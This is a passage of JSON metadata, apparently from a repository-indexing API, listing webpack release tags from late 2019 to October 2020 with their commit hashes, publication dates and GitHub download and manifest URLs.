ack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/ta